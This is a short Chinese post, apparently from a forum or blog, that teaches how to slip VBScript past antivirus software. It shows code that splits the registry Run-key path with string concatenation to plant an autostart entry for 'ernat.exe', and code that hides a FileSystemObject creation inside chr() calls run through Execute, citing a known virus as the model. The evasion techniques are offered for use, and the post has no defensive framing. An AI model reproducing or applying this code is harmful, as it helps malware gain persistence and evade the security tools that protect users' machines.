现在杀毒对vbs相当敏感只要发现对注册表xx作或使用vbs运行命令(加用户) 就可能被杀下面谈2思路方法可以简单解决:
1.使用连接符"&" 如:
Set CURObj = createObject("WScript.Shell")
mhk="HK"&"LM\SOFT"&"WARE\Micr"&"osoft\Win"&"dows\Curren"&"tVersion\Run\"
CURObj.RegWrite ""&mhk&"ernat.exe","ernat.exe"
2.使用Execute(BY 动鲨 )
些杀毒软件Software如瑞星他门会监视网页中代码旦你创建了FSO或写注册表即使是正常脚本他也会报告危险但是当年新欢乐时光也用了FSO如何就没报警呢?原因是这个病毒使用Execute这个来躲过了防火墙呵呵病毒将这段声明代码转化为串然后通过Execute(String)执行举个例子
str=" fso=createObject( " & chr(34) & "scrip" & chr(116)& "ing.FileObject"&chr(34)&""
msgbox str
Execute str
最新评论